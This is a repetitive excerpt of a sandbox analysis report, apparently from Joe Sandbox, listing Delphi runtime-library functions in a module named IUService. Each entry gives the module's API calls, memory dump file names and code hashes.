                                                                                                                                            • @System@@CopyRecord$qqrv.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B39A
                                                                                                                                            • @System@@IntfCopy$qqrr45System@%DelphiInterface$t17System@IInterface%x45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B3B5
                                                                                                                                            • @System@@DynArrayAsg$qqrv.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B3CB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$System@$CopyDelphiInterface$t17StringSystem@%UnicodeWide$ArrayArray$qqrvAsg$qqrpvpxvAsg$qqrr17Asg$qqrr20Asg$qqrvCopy$qqrr45Interface%Interface%x45IntfRecord$qqrvStringx17Stringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2237906399-0
                                                                                                                                            • Opcode ID: b04e6cb788995e5d8afb73564426f797f1c67d65cb384e711102801db3d5bd43
                                                                                                                                            • Instruction ID: 17e68543b33f0793b23223b217cdc46ee77ba68b7f488055d9e3e5e4418e0c98
                                                                                                                                            • Opcode Fuzzy Hash: b04e6cb788995e5d8afb73564426f797f1c67d65cb384e711102801db3d5bd43
                                                                                                                                            • Instruction Fuzzy Hash: 0B31C2B2B049988BF3207A49ECB179AF3D2AB94314FF54336D649D3312D671EE119681
                                                                                                                                            Function 5000B440 Relevance: 10.6, APIs: 7, Instructions: 94COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000B53E), ref: 5000B4C0
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000B53E), ref: 5000B4DF
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000,5000B53E), ref: 5000B4F5
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000B53E), ref: 5000B47B
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000B53E), ref: 5000B512
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$AnsiFromStr$qqrr20StringStringx27System@%System@@T$us$i0$%Unicode$Internal$Move$qqrpxvpvi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2269240621-0
                                                                                                                                            • Opcode ID: 07a4e3b2a30b5038fec9cdcacff2e7d97685f54e4cb4140f115b55e76aca54ed
                                                                                                                                            • Instruction ID: ab6cb9ca280b5cfd23ec245c9f52380a76360824adbb00bdbbb02a50cc25d4fa
                                                                                                                                            • Opcode Fuzzy Hash: 07a4e3b2a30b5038fec9cdcacff2e7d97685f54e4cb4140f115b55e76aca54ed
                                                                                                                                            • Instruction Fuzzy Hash: 11318E30700689DBBB11EFA8DAA266DB3F8EF49300BA046B5E601D7256E7B4DF40D750
                                                                                                                                            Function 5003288C Relevance: 10.6, APIs: 7, Instructions: 81COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Variants@@VarToWStr$qqrr17System@WideStringrx8TVarData.RTL120(00000000,5003297A,?,?), ref: 500328B0
                                                                                                                                            • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(00000000,5003297A,?,?), ref: 500328BB
                                                                                                                                            • @Sysutils@TryStrToInt64$qqrx20System@UnicodeStringrj.RTL120(00000000,5003297A,?,?), ref: 500328C6
                                                                                                                                              • Part of subcall function 5001B578: @System@@ValInt64$qqrx20System@UnicodeStringri.RTL120(?,?,50031C83,500328CB,00000000,5003297A,?,?), ref: 5001B583
                                                                                                                                            • @System@@ROUND$qqrv.RTL120(?,?), ref: 5003291A
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(50032981,?), ref: 50032974
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$Unicode$Int64$qqrx20Wide$Clr$qqrpvD$qqrvDataFromStr$qqrr17Str$qqrr20StringStringriStringrjStringrx8Stringx17Sysutils@Variants@@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 157879986-0
                                                                                                                                            • Opcode ID: 43d48fd890497f3278536665846c0a284e3a35f620148b89976c5c5457254fdd
                                                                                                                                            • Instruction ID: 8c9d59751d0c57f18d296972b6e651e1b45b7dd5a4c18d11aaa8980898164496
                                                                                                                                            • Opcode Fuzzy Hash: 43d48fd890497f3278536665846c0a284e3a35f620148b89976c5c5457254fdd
                                                                                                                                            • Instruction Fuzzy Hash: A5214870A0064AAFDB02DF99DC51BDEB3F8FF49300F608666E510E7261EB709E058B90
                                                                                                                                            Function 5001C3F4 Relevance: 10.6, APIs: 7, Instructions: 76COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C430
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C442
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C466
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C48D
                                                                                                                                            • @Sysutils@StrScan$qqrpxbb.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C49C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: StringSystem@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Char$qqrx20Scan$qqrpxbbSysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3324498720-0
                                                                                                                                            • Opcode ID: bf26a2b97ca58175508d886ed96bf389f4343cc66bbe0e155038a7790a10b8fe
                                                                                                                                            • Instruction ID: e1cde9bc071b440c39512abc6ffcd83c64075ec29b59cb21d599069659e6d0c2
                                                                                                                                            • Opcode Fuzzy Hash: bf26a2b97ca58175508d886ed96bf389f4343cc66bbe0e155038a7790a10b8fe
                                                                                                                                            • Instruction Fuzzy Hash: 6621F530A046D9EFDB11CFA8DD6297DB3F8EF94620BA04266E90197255E734DE80D680
                                                                                                                                            Function 50015AC8 Relevance: 10.6, APIs: 7, Instructions: 76COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50015B90), ref: 50015B01
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,50015B90), ref: 50015B12
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50015B90), ref: 50015B19
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50015B90), ref: 50015B38
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50015B90), ref: 50015B65
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@System@@Unicode$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Char$qqrx20Length$qqrr20Stringi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1537914859-0
                                                                                                                                            • Opcode ID: 1e13e7f021d760450b2d22ee9921c6ee7e773aeb530b874d90593081222a90d2
                                                                                                                                            • Instruction ID: c8b1f13dae7ebe80b3f85388a8d19f916493298cae09e507b059e2df6187fb7d
                                                                                                                                            • Opcode Fuzzy Hash: 1e13e7f021d760450b2d22ee9921c6ee7e773aeb530b874d90593081222a90d2
                                                                                                                                            • Instruction Fuzzy Hash: CF218030B0428ADFEB11DFB8DDD196AB3F9EF4820076042B6E601DB255E770DE81D644
                                                                                                                                            Function 500285BC Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002867D,?,?,?,00000000,-00000001,?,5001C6BF,00000000,5001C6EA), ref: 50028602
                                                                                                                                            • @Sysutils@ByteType$qqrx20System@UnicodeStringi.RTL120(00000000,5002867D,?,?,?,00000000,-00000001,?,5001C6BF,00000000,5001C6EA), ref: 50028622
                                                                                                                                              • Part of subcall function 5002772C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 5002776B
                                                                                                                                              • Part of subcall function 5002772C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277A2
                                                                                                                                              • Part of subcall function 5002772C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277D2
                                                                                                                                              • Part of subcall function 5002772C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277F8
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002867D,?,?,?,00000000,-00000001,?,5001C6BF,00000000,5001C6EA), ref: 50028648
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002867D,?,?,?,00000000,-00000001,?,5001C6BF,00000000,5001C6EA), ref: 50028651
                                                                                                                                            • @Sysutils@StrScan$qqrpxbb.RTL120(00000000,5002867D,?,?,?,00000000,-00000001,?,5001C6BF,00000000,5001C6EA), ref: 5002865B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$StringSystem@@$AnsiFromInternalStr$qqrr20Stringx27System@%T$us$i0$%$Sysutils@$ByteChar$qqrx20Scan$qqrpxbbStringiType$qqrx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3411762798-0
                                                                                                                                            • Opcode ID: d35db2a1ea66179b42cdae8437c045958a1c07e860a6d77cbb9ac8bb00c72174
                                                                                                                                            • Instruction ID: a8f6eb758e1e06c8c1c440b87328b3b1e64a0ab06fc938b2605612978542ffee
                                                                                                                                            • Opcode Fuzzy Hash: d35db2a1ea66179b42cdae8437c045958a1c07e860a6d77cbb9ac8bb00c72174
                                                                                                                                            • Instruction Fuzzy Hash: 8621D234603286EF9F11CFA4F9468AD73F9EF54240B5146A6E900D7212D770DE02D790
                                                                                                                                            Function 500168C0 Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Strutils@Soundex$qqrx20System@UnicodeStringi.RTL120(00000000,50016987,?,?,?,?,00000000,00000000,00000000,00000000), ref: 500168EE
                                                                                                                                              • Part of subcall function 5001671C: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016752
                                                                                                                                              • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 50016782
                                                                                                                                              • Part of subcall function 5001671C: @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,500168A1), ref: 500167A2
                                                                                                                                              • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 500167CD
                                                                                                                                              • Part of subcall function 5001671C: @Sysutils@IntToStr$qqri.RTL120(00000000,500168A1), ref: 500167FE
                                                                                                                                              • Part of subcall function 5001671C: @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016808
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016987,?,?,?,?,00000000,00000000,00000000,00000000), ref: 5001690C
                                                                                                                                              • Part of subcall function 50009EBC: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 50009EC4
                                                                                                                                            • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(00000000,50016987,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016914
                                                                                                                                              • Part of subcall function 5001B48C: @System@@ValLong$qqrx20System@UnicodeStringri.RTL120 ref: 5001B497
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016987,?,?,?,?,00000000,00000000,00000000,00000000), ref: 5001693A
                                                                                                                                            • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(00000000,50016987,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016942
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$System@@$FromString$Char$qqrr20StringbSysutils@$AnsiInt$qqrx20InternalStr$qqrr20Stringx20Stringx27System@%T$us$i0$%$Asg$qqrr20Cat$qqrr20CharLen$qqrr20Long$qqrx20Soundex$qqrx20Str$qqriStringiStringpbiStringriStrutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2274701456-0
                                                                                                                                            • Opcode ID: ac56bb5497c64dd101285ab6a25fa0cdf7d2c5530a325b6ab08d65c0f87a2b94
                                                                                                                                            • Instruction ID: c54646ffe945ded697551258782202c198b97f85722a43d93f103e696720e317
                                                                                                                                            • Opcode Fuzzy Hash: ac56bb5497c64dd101285ab6a25fa0cdf7d2c5530a325b6ab08d65c0f87a2b94
                                                                                                                                            • Instruction Fuzzy Hash: 6621D731E041986BDB05CBE8CC52AAEB7FEDF85200B55C3B6E84093246E6749E449690
                                                                                                                                            Function 50031424 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VariantCopy.OLEAUT32(00000000,00000000), ref: 50031445
                                                                                                                                            • @Variants@VarResultCheck$qqrl.RTL120(00000000,00000000,?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 5003144A
                                                                                                                                              • Part of subcall function 50031010: VariantClear.OLEAUT32(?), ref: 5003101F
                                                                                                                                              • Part of subcall function 50031010: @Variants@VarResultCheck$qqrl.RTL120(?,?,?,?,500310B6,50030FEB), ref: 50031024
                                                                                                                                            • @System@@LStrAsg$qqrpvpxv.RTL120(?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 5003146B
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 50031489
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Check$qqrlResultSystem@System@@UnicodeVariantVariants@$Asg$qqrpvpxvAsg$qqrr20ClearCopyStringStringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2751304118-0
                                                                                                                                            • Opcode ID: 47edba981e59826270ba9347fc8f56c62352a95c8f4581b4b0b067ba06d8f3f1
                                                                                                                                            • Instruction ID: ee00f14aff617dd426c24f8c2058554ec1a3e359a2800c497603794938079f51
                                                                                                                                            • Opcode Fuzzy Hash: 47edba981e59826270ba9347fc8f56c62352a95c8f4581b4b0b067ba06d8f3f1
                                                                                                                                            • Instruction Fuzzy Hash: 97116D207122908FDB22DF65D8C55CB73E6AF89750F289A67E949CB21BDA71CC41C3A1
                                                                                                                                            Function 5003546C Relevance: 10.6, APIs: 7, Instructions: 70COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Variants@FindCustomVariantType$qqrxusrp27Variants@TCustomVariantType.RTL120(00000000,50035537,?,?), ref: 5003549F
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 500354B1
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(?,?,?,00000000,50035537,?,?), ref: 500354DD
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,00000000,50035537,?,?), ref: 500354EF
                                                                                                                                            • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(?,?,?,00000000,50035537,?,?), ref: 500354FA
                                                                                                                                            • @Variants@@VarClear$qqrr8TVarData.RTL120(5003551C,00000000,50035537,?,?), ref: 5003550F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
